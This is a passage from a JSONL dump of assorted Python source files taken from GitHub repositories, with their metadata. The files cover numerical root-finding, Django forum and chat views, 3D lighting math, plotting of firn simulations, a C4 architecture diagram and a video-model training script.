1)) == 1\nassert (sls.sum(0, 5)) == 15\nassert (sls.sum(1, 1)) == None\nassert (sls.sum(-1, 1)) == None\nassert (sls.sum(2, 1)) == None\n","repo_name":"ericgarig/daily-coding-problem","sub_path":"149-sum-sublist.py","file_name":"149-sum-sublist.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"306109749","text":"import math\n\ndef func(p, a):\n sum = 0\n p.reverse()\n for i in range(len(p)):\n sum += p[i] * pow(a, i)\n p.reverse()\n return sum\n\ndef dfunc(p, a):\n dp = []\n p.reverse()\n for i in range(len(p)):\n coef = p[i] * i\n if (coef != 0):\n dp.append(coef)\n sum = 0\n for i in range(len(dp)):\n sum += dp[i] * pow(a, i)\n p.reverse()\n return sum\n\ndef bisection(a, b, p, epsilon):\n k = 0\n while abs(a - b) >= epsilon:\n k += 1\n c = (a + b) / 2\n if func(p, a) * func(p, c) <= 0.0:\n b = c\n else:\n a = c\n #print('a:', a, ' | b: ', b)\n return ((a + b) / 2, k)\n\ndef chord(a, b, p, epsilon):\n k = 0\n while True:\n k += 1\n c = ( (a * func(p, b)) - (b * func(p, a))) / (func(p, b) - func(p, a))\n if func(p, a) * func(p, c) <= 0.0:\n b = c\n else:\n a = c\n #print('a:', a, ' | b: ', b)\n if abs( func(p, c)) < epsilon:\n return c, k\n \ndef newton(a, b, p, epsilon):\n x = b\n k = 0\n while abs(func(p ,x)) >= epsilon:\n k += 1\n x -= func(p, x) / dfunc(p, x)\n if func(p, a) * func(p, x) <= 0.0:\n b = x\n else:\n a = x\n #print('a:', a, ' | b: ', b)\n return x, k\n\ndef calculate(intervals, epsilon, p):\n for i in range(len(intervals)):\n print('X' + str( i + 1) + ':')\n \n a = bisection(intervals[i][0], intervals[i][1], p, epsilon)\n print(a[0])\n print('Метод бісекцій. Ітерацій:', a[1])\n \n b = chord(intervals[i][0], intervals[i][1], p, epsilon)\n print(b[0])\n print('Метод хорд. Ітерацій:', b[1])\n \n c = newton(intervals[i][0], intervals[i][1], p, epsilon)\n print(c[0])\n print('Метод Ньютона. Ітерацій:', c[1])\n\ndef main():\n epsilon = pow(10, -5)\n p = [2, -2, -4, 0, 2, 1]\n intervals = ((-2.4142, -0.3864), (0.3864, 1), (1,3))\n calculate(intervals, epsilon, p)\n\nif __name__ == \"__main__\":\n main()","repo_name":"user3719431/nma_lab1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15480383790","text":"from django.conf.urls import url\nfrom . import views\n\napp_name = \"forum\"\n\nurlpatterns = [\n url(r\"^$\",views.index,name=\"index\"),\n url(r\"^logout\",views.logout,name=\"logout\"),\n url(r\"^(?P.+)/$\",views.forum,name=\"forum\"),\n url(r\"^newThread$\",views.newThread,name=\"newThread\"),\n url(r\"^createThread$\",views.createThread,name=\"createThread\"),\n url(r\"^thread/(?P.+)\",views.showThread,name=\"showThread\"),\n url(r\"^post$\",views.newPost,name=\"newPost\"),\n url(r\"^createForum\",views.newForum,name=\"newForum\"),\n \n ]\n","repo_name":"qhuang872/helpMyCat_project","sub_path":"apps/forum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3265548224","text":"import math\nfrom display import *\n\n\n # IMPORANT NOTE\n\n # Ambient light is represeneted by a color value\n\n # Point light sources are 2D arrays of doubles.\n # - The fist index (LOCATION) represents the vector to the light.\n # - The second index (COLOR) represents the color.\n\n # Reflection constants (ka, kd, ks) are represened as arrays of\n # doubles (red, green, blue)\n\nAMBIENT = 0\nDIFFUSE = 1\nSPECULAR = 2\nLOCATION = 0\nCOLOR = 1\nSPECULAR_EXP = 4\n\n#lighting functions\ndef get_lighting(normal, view, ambient, light, areflect, dreflect, sreflect ):\n color = [0, 0, 0]\n for j in range(3):\n I = 0\n I += ambient[j] * areflect[j]\n I += light[1][j] * dreflect[j] * (dot_product(normalize(normal), normalize(light[0])))\n stuff = (dot_product( subtract( scale( (scale( normalize(normal), 2)) , (dot_product(normalize(normal), normalize(light[0])))) , normalize(light[0])) , normalize(view)))\n if stuff < 0 and SPECULAR_EXP % 2 is 0:\n stuff = -1 * math.pow( stuff, SPECULAR_EXP)\n else:\n stuff = math.pow(stuff, SPECULAR_EXP)\n I += light[1][j] * sreflect[j] * stuff\n color[j] = I\n return limit_color(color)\n\ndef limit_color(color):\n for i in range(3):\n if color[i] < 0:\n color[i] = 0\n if color[i] > 255:\n color[i] = 255\n color[i] = int(color[i])\n return color\n\n#vector functions\n#normalize vetor, should modify the parameter\ndef normalize(vector):\n magnitude = math.sqrt( vector[0] * vector[0] +\n vector[1] * vector[1] +\n vector[2] * vector[2])\n for i in range(3):\n vector[i] = vector[i] / magnitude\n return vector\n \ndef scale(vector, const):\n return [vector[0] * const, vector[1] * const, vector[2] * const]\n\ndef subtract(a, b):\n return [a[0] - b[0], a[1] - b[1], a[2] - b[2]]\n\n#Return the dot porduct of a . b\ndef dot_product(a, b):\n return a[0] * b[0] + a[1] * b[1] + a[2] * b[2]\n\n#Calculate the surface normal for the triangle whose first\n#point is located at index i in polygons\ndef calculate_normal(polygons, i):\n\n A = [0, 0, 0]\n B = [0, 0, 0]\n N = [0, 0, 0]\n\n A[0] = polygons[i+1][0] - polygons[i][0]\n A[1] = polygons[i+1][1] - polygons[i][1]\n A[2] = polygons[i+1][2] - polygons[i][2]\n\n B[0] = polygons[i+2][0] - polygons[i][0]\n B[1] = polygons[i+2][1] - polygons[i][1]\n B[2] = polygons[i+2][2] - polygons[i][2]\n\n N[0] = A[1] * B[2] - A[2] * B[1]\n N[1] = A[2] * B[0] - A[0] * B[2]\n N[2] = A[0] * B[1] - A[1] * B[0]\n\n return N\n","repo_name":"michaellikaiye/MKS66-lighting","sub_path":"gmath.py","file_name":"gmath.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7129526266","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 14 14:24:03 2022\n\n@author: jespe\n\"\"\"\nfrom reader import read\nimport matplotlib.pyplot as plt \nfrom celluloid import Camera\nplt.rcParams['font.size'] = '16'\ncmap = plt.cm.get_cmap('viridis')\nimport numpy as np\nimport seaborn as sns\nsns.set()\nfrom pathlib import Path\nimport os\ndef plotter(i,ax,cm,temperature,forcing,d15N2,d40Ar,depth,diffusivity,density,age):\n \n ax[0,0].plot(forcing[:,0],forcing[:,1],'r-')\n ax2=ax[0,0].twinx()\n ax2.plot(forcing[:,0],forcing[:,2],'b-')\n ax[0,0].set_xlabel(r'Model-time [yr]')\n ax[0,0].set_ylabel(r'Temperature forcing [K]')\n ax2.set_ylabel(r'Accumulation ice equivalent [m yr$^{-1}$]')\n #print(depth.shape,d15N2.shape)\n \n \n \n \n ax10=ax[0,1].twiny()\n\n ax[0,1].set_xlabel(\"$\\delta^{15}N$ [‰]\",color=cmap(cmap_interval[3]))\n ax10.set_xlabel(\"$\\delta^{40}Ar$ [‰]\",color=cmap(cmap_interval[1]))\n #ax[0,1].set_xlabel(\"Model-time [yr]\")\n \n ax10.set_xlim(0,1)\n ax[0,1].set_xlim(0,1)\n ax[0,1].plot(d15N2[i,1:],depth[i,1:],color=cmap(cmap_interval[3]))\n ax10.plot(d40Ar[i,1:],depth[i,1:],color=cmap(cmap_interval[1]))\n ax[0,1].set_ylabel(r'Depth [m]')\n \n #ax[0,1].set_xlabel(u'$\\delta^{15}$N ‰')\n ax[0,1].xaxis.get_offset_text().set_visible(False)\n #ax[0,1].set_ylim(0,121)\n #ax[0,1].set_xlim(1000.0001,1000.2)\n ax[0,1].invert_yaxis()\n \n ax[0,2].plot(diffusivity[i,1:],depth[i,1:],color=cmap(cm))\n ax[0,2].set_xlabel(r'Diffusivity [m$^2$ s$^{-1}$]')\n ax[0,2].set_ylabel(r'Depth [m]')\n #ax[0,2].set_ylim(0,121)\n #ax[0,2].set_xlim(-0.1e-5,2.3e-5)\n ax[0,2].invert_yaxis()\n \n ax[1,0].plot(density[i,1:],depth[i,1:],color=cmap(cm))\n ax[1,0].set_xlabel(r'Density [kg m$^{-3}$]')\n ax[1,0].set_ylabel(r'Depth [m]')\n #ax[1,0].set_ylim(0,121)\n #ax[1,0].set_xlim(300,1000)\n ax[1,0].invert_yaxis()\n \n ax[1,1].plot(temperature[i,1:],depth[i,1:],color=cmap(cm))\n ax[1,1].set_xlabel(r'Temperature [K]')\n ax[1,1].set_ylabel(r'Depth [m]')\n ax[1,1].xaxis.set_major_locator(plt.MaxNLocator(6))\n ax[1,1].set_xlim(243,255)\n #ax[1,1].set_ylim(0,121)\n ax[1,1].invert_yaxis()\n \n ax[1,2].plot(age[i,1:],depth[i,1:],color=cmap(cm))\n ax[1,2].set_xlabel(r'Ice Age [yr]')\n ax[1,2].set_ylabel(r'Depth [m]')\n #ax[1,2].set_ylim(0,121)\n #ax[1,2].set_xlim(0,410)\n ax[1,2].invert_yaxis()\n\nfolder = './CFM/CFM_main/CFMinput'\nFolder = np.array(['Temp_ramp'])\n#Folder = [name for name in os.listdir(folder) if os.path.isdir(os.path.join(folder, name))]\nrfolder = 'CFM/CFM_main/CFMoutput//'\n\ntimesteps,stps,depth,density,temperature,diffusivity,forcing,age,climate,d15N2,d40Ar,Bubble = read(rfolder+Folder[0])\n\ncmap_interval = np.linspace(0,1,7)\nrows, cols = 2,3\nfig, ax = plt.subplots(rows,cols,figsize=(15, 15), tight_layout=True)\nplotter(-1,ax,cmap_interval[0],temperature,forcing,d15N2,d40Ar,depth,diffusivity,density,age)\n\nrows,cols = 2,1\n\nfig, axs = plt.subplots(2, 1, sharex=True)\n\n\n\naxs[0].plot(timesteps,Bubble[:,2])\naxs[1].plot(timesteps,Bubble[:,6])\naxs[0].invert_yaxis()\naxs[1].invert_yaxis()\n#axs[1].set_ylim(130,60)\n#axs[0].set_ylim(130,60)\n\n# Remove vertical space between axes\nprint(Bubble[-1,2],Bubble[-1,6])\n'''\nfor j in range(len(Folder)):\n timesteps,stps,depth,density,temperature,diffusivity,forcing,age,climate,d15N2,d40Ar,Bubble = read(rfolder+Folder[j])\n path = Path('CFM/CFM_main/CFMoutput/' + Folder[j])\n path.mkdir(parents=True, exist_ok=True)\n \n for i in range(len(timesteps[::50])):\n rows, cols = 2,3\n fig, ax = plt.subplots(rows,cols,figsize=(15, 15), tight_layout=True)\n print(i)\n \n plotter(i,ax,cmap_interval[0],temperature,forcing,d15N2,d40Ar,depth,diffusivity,density,age)\n plt.savefig('ImageFolder/'+str(Folder[j])+'/{0:03d}'.format(i)+'.png')\n plt.close(fig)\n #plt.clf()\n\n '''\n","repo_name":"Arcaru24601/CommunityFirnThesis","sub_path":"Python/Plot.py","file_name":"Plot.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"71581763686","text":"from math import factorial\n\nclass Solution:\n def getPermutation(self, n: int, k: int) -> str:\n self.length = 0\n self.idxx = k\n self.n = n\n self.excep = set()\n\n op = self.backtrack([], n)\n \n return \"\".join(map(str, op))\n \n def backtrack(self, currArr, n, k):\n \n if k == self.idxx: \n return currArr\n \n \n fact = factorial(n-1)\n val = (k-1)//fact\n\n self.excep.add(val+1)\n self.length += val*fact\n\n op = self.backtrack([], 1)\n","repo_name":"debug-cmd/leetcode-backtracking","sub_path":"permutation_sequence.py","file_name":"permutation_sequence.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30488396820","text":"class ZakresLiczb:\n def __init__(self, end, start=0, step=1):\n self.liczba = start\n self.end = end\n\n if step <= 0:\n raise ValueError('Parametr \"step\" musi być dodatni')\n self.step = step\n\n\n def __next__(self):\n if self.liczba >= self.end:\n raise StopIteration\n\n zwracana = self.liczba\n self.liczba += self.step\n return zwracana\n\n def __iter__(self):\n return self\n\n\nif __name__ == '__main__':\n pl = ZakresLiczb(10)\n print(list(pl))\n\n pl = ZakresLiczb(20, 10)\n print(list(pl))\n\n pl = ZakresLiczb(30, 10, 3)\n print(list(pl))\n\n","repo_name":"remekwilk/python_adv","sub_path":"zajecia02/zadanie0201_etap2.py","file_name":"zadanie0201_etap2.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25000689221","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n@author: Brodie Lawson et al. (see README), Benjamin Miller \r\n\r\nThis function simply builds a basic struct that contains the mesh\r\ninformation, to be used by the other functions. \r\n\r\nInput: Nx: Number of x-axis pixels\r\n Ny: Number of y-axis pixels\r\n Pixel_width: Dimensionality scaling parameter, leave as default. \r\n\r\nOutput:\r\n Mesh: meshgrid dictionary for image structure \r\n\"\"\"\r\nimport numpy as np\r\n\r\ndef main(Nx=500,Ny=500,pixel_width=.0075):\r\n # Create a set of points that fall in centres of pixels\r\n xv = np.linspace(pixel_width/2, pixel_width*(Nx-1/2), Nx);\r\n yv = np.linspace(pixel_width/2, pixel_width*(Ny-1/2), Ny);\r\n Y,X = np.meshgrid(yv,xv);\r\n points = [np.ravel(X,'F'),np.ravel(Y,'F')]; #2,25x, inverse Matlab\r\n # Store in mesh struct\r\n mesh = {'points':points, 'Nx':Nx, 'Ny': Ny};\r\n return mesh \r\n\r\n","repo_name":"bgmiller100/perlingen","sub_path":"lib/lib_create/buildMesh.py","file_name":"buildMesh.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73181860644","text":"import argparse\nimport json\nimport logging\n\nfrom responsibleai import RAIInsights\n\n\nfrom constants import RAIToolType\nfrom rai_component_utilities import (\n load_rai_insights_from_input_port,\n save_to_output_port,\n copy_dashboard_info_file,\n)\n\n_logger = logging.getLogger(__file__)\nlogging.basicConfig(level=logging.INFO)\n\n\ndef parse_args():\n # setup arg parser\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--rai_insights_dashboard\", type=str, required=True)\n parser.add_argument(\"--max_depth\", type=int)\n parser.add_argument(\"--num_leaves\", type=int)\n parser.add_argument(\"--filter_features\", type=json.loads, help=\"List\")\n parser.add_argument(\"--error_analysis_path\", type=str)\n\n # parse args\n args = parser.parse_args()\n\n # Patch issue with argument passing\n if isinstance(args.filter_features, list) and len(args.filter_features) == 0:\n args.filter_features = None\n\n # return args\n return args\n\n\ndef main(args):\n # Load the RAI Insights object\n rai_i: RAIInsights = load_rai_insights_from_input_port(args.rai_insights_dashboard)\n\n # Add the error analysis\n rai_i.error_analysis.add(\n max_depth=args.max_depth,\n num_leaves=args.num_leaves,\n filter_features=args.filter_features,\n )\n _logger.info(\"Added error analysis\")\n\n # Compute\n rai_i.compute()\n _logger.info(\"Computation complete\")\n\n # Save\n save_to_output_port(rai_i, args.error_analysis_path, RAIToolType.ERROR_ANALYSIS)\n _logger.info(\"Saved to output port\")\n\n # Copy the dashboard info file\n copy_dashboard_info_file(args.rai_insights_dashboard, args.error_analysis_path)\n\n _logger.info(\"Completing\")\n\n\n# run script\nif __name__ == \"__main__\":\n # add space in logs\n print(\"*\" * 60)\n print(\"\\n\\n\")\n\n # parse args\n args = parse_args()\n\n # run main function\n main(args)\n\n # add space in logs\n print(\"*\" * 60)\n print(\"\\n\\n\")\n","repo_name":"Azure/AutoML-vNext-Preview","sub_path":"src/responsibleai/rai_analyse/create_error_analysis.py","file_name":"create_error_analysis.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"38464289767","text":"#context\nfrom diagrams import Diagram\nfrom diagrams.c4 import Person, Container, Database, System, SystemBoundary, Relationship\n\ngraph_attr = {\n \"splines\": \"spline\",\n}\n\nwith Diagram(\"Diagrama de contexto da solução de inbound e outbound\", direction=\"TB\", graph_attr=graph_attr):\n intituicaoFinanceira = Person(name=\"Instituição Financeira\", description=\"Intituição regulamentada e altorizado a operar cambio no pais (corretora, bancos, fintechs)\")\n remessadora = Person(name=\"Remessadora\", description=\"Empresa responsavel por enviar dinheiro a outros paises\") \n bacen = Person(name=\"BACEN\", description=\"Banco central do brasil\") \n\n with SystemBoundary(\"Barramento Cambial\"):\n gatewayApi = Container(\n name=\"Gateway Barramento\", \n description=\"Responsabilidade receber as chamadas do meio externo e direcionar para o recurso correto\"\n )\n\n portal = Container(\n name=\"Portal Transações\",\n description=\"Prover recursos para o usuario\",\n technology=\"SPA (Angular, React, Vue Js)\"\n )\n\n with SystemBoundary(\"Contexto de Negociacao\"):\n co_negociador = Container(name = \"API Negociador\", description= \"Responsavel por realizar a negociação do ambiente\")\n co_oraculo = Container(name = \"API do Oraculo da Negociacao\", description=\"Estabelecimento de algumas premissas para que a mesma ocorra\")\n db_oraculo = Database(name = \"DB Oraculo\", description=\"Base de dados com os oraculos da transcao\",technology=\"NoSQL\")\n db_negociador = Database(name = \"DB Negociacao\", description=\"Base de dados Negociacao\", technology=\"SQL\")\n\n co_negociador >> Relationship(\"Persiste dados\") >> db_negociador\n co_oraculo >> Relationship(\"Persiste dados\") >> db_oraculo\n co_negociador >> Relationship(\"Consulta oraculo\") >> co_oraculo \n\n with SystemBoundary(\"Contexto de Mercado\"):\n co_mercado = Container(name= \"API Mercado\", description= \"Api criada para realizar consultas do mercado\") \n db_negociador = Database(name=\"DB Mercado\",description=\"Responsavel por persistir taxas do mercado\",technology=\"Cache\")\n ag_negociador = Container(name= \"Agent Mercado\", description=\"Responsavel por consultar fontes externas e deixar disponivel\")\n\n ag_negociador >> Relationship(\"Persiste dados para o ambiente\") >> db_negociador\n co_mercado >> Relationship(\"Consulta a base de cache\") >> db_negociador\n\n with SystemBoundary(\"Contexto de Fechamento\"):\n co_fechamento = Container(name = \"API Fechamento\", description= \"Api que realiza fechamento\")\n db_fechamento = Database(name= \"DB Fechamento\", description=\"Armazenamento de todas as operações fechadas\", technology=\"NoSQL\")\n\n co_fechamento >> Relationship(\"Salva a transação\") >> db_fechamento\n\n biro = System(name=\"Biro de taxas\", description=\"Fornecimento de taxas do mercado para operação\", external=True)\n\n remessadora >> Relationship(\"Acessa o portal\") >> portal\n\n intituicaoFinanceira >> Relationship(\"Acessa o portal\") >> portal\n\n portal >> Relationship(\"Envia propostas de negociação / Fechamentos\") >> gatewayApi\n\n ag_negociador >> Relationship(\"Consulta Biro\") >> biro\n\n co_oraculo >> Relationship(\"Consulta taxas a mercado\") >> co_mercado\n\n #Relacionamento do Gateway\n gatewayApi >> Relationship(\"Consome API\") >> co_negociador\n gatewayApi >> Relationship(\"Consome API\") >> co_fechamento\n\n","repo_name":"PdiEnviroment/architecture","sub_path":"C4/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13041341956","text":"from django.shortcuts import render, redirect\nfrom django.shortcuts import get_object_or_404, render\nfrom .forms import NewUserForm\nfrom django.contrib.auth import login, authenticate ,logout #add this#add this\nfrom django.contrib import messages\nfrom django.contrib.auth.forms import AuthenticationForm #add this\nfrom django.shortcuts import render\nfrom .models import *\nfrom django.urls import reverse\nfrom django.db.models import *\nfrom django.http import HttpResponseRedirect\n\n\ndef register_request(request):\n if request.method == \"POST\":\n form = NewUserForm(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n current_user = UserStatus.objects.filter(users_id=user.id)\n if not current_user:\n UserStatus.objects.create(users = user, active=True)\n else:\n UserStatus.objects.filter(users_id=user.id).update(active=True) \n messages.success(request, \"Registration successful.\" )\n return redirect(\"instagram:homepage\")\n messages.error(request, \"Unsuccessful registration. Invalid information.\")\n form = NewUserForm()\n return render (request=request, template_name=\"instagram/register.html\", context={\"register_form\":form})\n\n\ndef login_request(request):\n if request.method == \"POST\":\n form = AuthenticationForm(request, data=request.POST)\n if form.is_valid():\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n current_user = UserStatus.objects.filter(users_id=user.id)\n if not current_user:\n UserStatus.objects.create(users = user, active=True)\n else:\n UserStatus.objects.filter(users_id=user.id).update(active=True) \n messages.info(request, f\"You are now logged in as {username}.\")\n return redirect(\"instagram:homepage\")\n else:\n messages.error(request,\"Invalid username or password.\")\n else:\n messages.error(request,\"Invalid username or password.\")\n form = AuthenticationForm()\n return render(request=request, template_name=\"instagram/login.html\", context={\"login_form\":form})\n\n\ndef logout_request(request):\n user = request.user \n UserStatus.objects.filter(users_id=user.id).update(active=False) \n logout(request) \n messages.info(request, \"You have successfully logged out.\") \n return redirect(\"instagram:login\")\n\n\ndef homepage(request):\n active_users = User.objects.filter(userstatus__active=True)\n context = {\n 'active_users': active_users,\n }\n return render(request,'instagram/index.html', context)\n\ndef one_to_one_chat(request):\n user = request.user \n user = get_object_or_404(User, pk=user.id)\n coversations = Conversation.objects.annotate(count_member = Count('member')).filter(count_member__lte=2, member = user.id)\n context = {\n 'coversations': coversations,\n }\n return render(request,'instagram/singlechat.html', context)\n \n\ndef group_chat(request):\n user = request.user \n user = get_object_or_404(User, pk=user.id)\n coversations = Conversation.objects.annotate(count_member = Count('member')).filter(count_member__gt=2, member = user.id)\n context = {\n 'coversations': coversations,\n }\n return render(request,'instagram/singlechat.html', context)\n\n\ndef chat(request, single_coversations_id):\n user = request.user\n conversation_id = Conversation.objects.get(pk=single_coversations_id)\n with_user = conversation_id.member.all().exclude(id=user.id).first()\n messages = conversation_id.message_set.all() \n context = {\n 'with_user_id': with_user.id,\n 'messages': messages,\n 'conversation_id': conversation_id,\n }\n return render(request,'instagram/userchats.html', context)\n\n\ndef send(request, conversation_id):\n user = request.user\n conversations = Conversation.objects.get(pk=conversation_id)\n message = request.POST['message']\n tag = request.POST['tag']\n if tag:\n message = \"@\" + tag + \" \" + message\n \n Message.objects.create(sender=user , conversation=conversations, message_text=message )\n return HttpResponseRedirect(reverse('instagram:chat', args=(conversations.id,)))\n\ndef reply(request, message_id):\n message = Message.objects.get(pk=message_id)\n context = {\n 'message': message,\n }\n return render(request,'instagram/userreply.html',context)\n\ndef replied(request, message_id):\n user = request.user\n message = Message.objects.get(pk=message_id)\n reply = request.POST['reply']\n tag = request.POST['tag']\n if tag:\n reply = \"@\" + tag + \" \" + reply\n conversations = message.conversation\n Reply.objects.create(sender=user , message = message, reply_text = reply )\n return HttpResponseRedirect(reverse('instagram:chat', args=(conversations.id,)))\n\ndef msg_react(request, message_id):\n message = Message.objects.get(pk=message_id)\n context = {\n 'message': message,\n }\n return render(request,'instagram/userreact.html',context)\n\ndef msg_reacted(request, message_id):\n user = request.user\n message = Message.objects.get(pk=message_id)\n reaction = request.POST['reaction']\n conversations = message.conversation\n Reaction.objects.create(reactor=user , content_object = message, text = reaction )\n return HttpResponseRedirect(reverse('instagram:chat', args=(conversations.id,)))\n\ndef reply_react(request, reply_id):\n reply = Reply.objects.get(pk=reply_id)\n context = {\n 'reply': reply,\n }\n return render(request,'instagram/userreacts.html', context)\n\ndef reply_reacted(request, reply_id):\n user = request.user\n reply = Reply.objects.get(pk=reply_id)\n reaction = request.POST['reaction']\n conversations = reply.message.conversation\n Reaction.objects.create(reactor=user , content_object = reply, text = reaction )\n return HttpResponseRedirect(reverse('instagram:chat', args=(conversations.id,)))\n ","repo_name":"farid-hussain-qbatch/instagram","sub_path":"instagram/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29922353481","text":"from model.BaseFileFactory.Directory import Directory\nfrom model.BaseFileFactory.File import File\n\n\nclass BaseFileFactory(object):\n \"\"\"\n\n \"\"\"\n\n def __init__(self):\n super(BaseFileFactory, self).__init__()\n\n @staticmethod\n def get_file(filename):\n from os.path import isfile, isdir\n if isfile(filename):\n return File(filename)\n elif isdir(filename):\n return Directory(filename)\n else:\n return None\n","repo_name":"alfredo-milani/ParseScript","sub_path":"src/model/BaseFileFactory/BaseFileFactory.py","file_name":"BaseFileFactory.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17658659614","text":"import os\nimport sys\n\nimport numpy as np\nimport sklearn.metrics\nimport torch\nimport torchvision\nimport argparse\n\nimport wandb\n\nfrom datasets.echonet_dynamic import EchoNet\nfrom utils import get_optimizer, get_lr_scheduler, get_model, get_mean_and_sd, run_train, run_test, set_seed\n\ndef main():\n my_parser = argparse.ArgumentParser(description='Run script')\n\n my_parser.add_argument('--exp_no',\n type=str,\n default=\"\",\n help='Experiment number for wandb')\n\n my_parser.add_argument('--exp_name',\n type=str,\n default=\"\",\n help='Experiment name for wandb')\n\n my_parser.add_argument('--data_dir',\n type=str,\n default='./data',\n help='Path to data directory')\n\n my_parser.add_argument('--output',\n type=str,\n default=None,\n help='Path to output directory')\n\n my_parser.add_argument('--model_name',\n choices=['r2plus1d_18', 'mc3_18', 'r3d_18', 'uniformer_small', 'uniformer_base'],\n default='uniformer_small',\n help='Model name')\n\n my_parser.add_argument('--pretrained',\n type=bool,\n default=True,\n help='Whether to use pretrained model or not')\n\n my_parser.add_argument('--weights',\n type=str,\n default=None,\n help='Path to checkpoint to load')\n\n my_parser.add_argument('--epochs',\n type=int,\n default=45,\n help='Number of epochs to train')\n\n my_parser.add_argument('--optimizer_name',\n type=str,\n default='adamW',\n help='Optimizer name')\n\n my_parser.add_argument('--lr_scheduler',\n choices=['step', 'LWCA'],\n default='step',\n help='Learning rate scheduler to use')\n\n my_parser.add_argument('--lr',\n type=float,\n default=1e-4,\n help='Learning rate')\n\n my_parser.add_argument('--weight_decay',\n type=float,\n default=1e-4,\n help='Weight decay')\n\n my_parser.add_argument('--lr_step_period',\n type=int,\n default=15,\n help='Learning rate decay period')\n\n my_parser.add_argument('--frames',\n type=int,\n default=32,\n help='Number of frames to select')\n\n my_parser.add_argument('--frequency',\n type=int,\n default=2,\n help='Period between frames')\n\n my_parser.add_argument('--num_workers',\n type=int,\n default=4,\n help='Number of workers')\n\n my_parser.add_argument('--batch_size',\n type=int,\n default=16,\n help='Batch size')\n\n my_parser.add_argument('--device',\n type=str,\n default=None,\n help='Device to use')\n\n\n args = my_parser.parse_args()\n\n print(\"Exp Name: \", args.exp_name)\n print(\"Exp No.: \", args.exp_no)\n print(\"Model Name: \", args.model_name)\n print(\"Pretrained: \", args.pretrained)\n print(\"Epochs: \", args.epochs)\n\n print(args)\n\n wandb.init(\n name=args.exp_name,\n project=\"EchoCoTr\"\n )\n wandb.config.update({\n \"model_name\": args.model_name,\n \"pretrained\": args.pretrained,\n \"weights\": args.weights,\n \"epochs\": args.epochs,\n \"lr\": args.lr,\n \"weight_decay\": args.weight_decay,\n \"lr_step_period\": args.lr_step_period,\n \"frames\": args.frames,\n \"frequency\": args.frequency,\n \"num_workers\": args.num_workers,\n \"device\": args.device,\n \"batch_size\": args.batch_size,\n \"optimizer\": args.optimizer_name,\n \"lr_scheduler\": args.lr_scheduler\n })\n\n set_seed(0)\n\n if args.output is None:\n output = os.path.join(\"output_\" + str(args.exp_no), \"video\", \"{}_{}_{}_{}\".format(args.model_name, args.frames, args.frequency, \"pretrained\" if args.pretrained else \"random\"))\n else:\n output = args.output\n os.makedirs(output, exist_ok=True)\n\n if args.device is None:\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n model = get_model(args.model_name, args)\n\n wandb.watch(model)\n\n if device.type == \"cuda\":\n model = torch.nn.DataParallel(model)\n model.to(device)\n\n optimizer = get_optimizer(model, args)\n\n lr_scheduler = get_lr_scheduler(optimizer, args)\n\n args.mean, args.std = get_mean_and_sd(EchoNet(root=args.data_dir, split=\"train\"))\n\n with open(os.path.join(output, \"log.csv\"), \"a\") as f:\n epoch_resume = 0\n bestLoss = float(\"inf\")\n try:\n checkpoint = torch.load(os.path.join(output, \"checkpoint.pt\"))\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['opt_dict'])\n lr_scheduler.load_state_dict(checkpoint['scheduler_dict'])\n epoch_resume = checkpoint[\"epoch\"] + 1\n bestLoss = checkpoint[\"best_loss\"]\n f.write(\"Resuming from epoch {}\\n\".format(epoch_resume))\n print(\"Epochs to resume: \", epoch_resume)\n except FileNotFoundError:\n f.write(\"Starting run from scratch\\n\")\n\n # Run Training Step\n if epoch_resume < args.epochs:\n run_train(output, device, model, optimizer, lr_scheduler, bestLoss, epoch_resume, wandb, f, args)\n\n print(model)\n\n # Run Testing Step\n run_test(output, device, model, wandb, f, args)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"BioMedIA-MBZUAI/EchoCoTr","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6113,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"} +{"seq_id":"9344534045","text":"\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 31 11:54:32 2023\r\n\r\n@author: Sezgin Katırcı\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\ntraindata=pd.read_csv(\"C:\\\\Users\\\\Dell\\\\Desktop\\\\House price 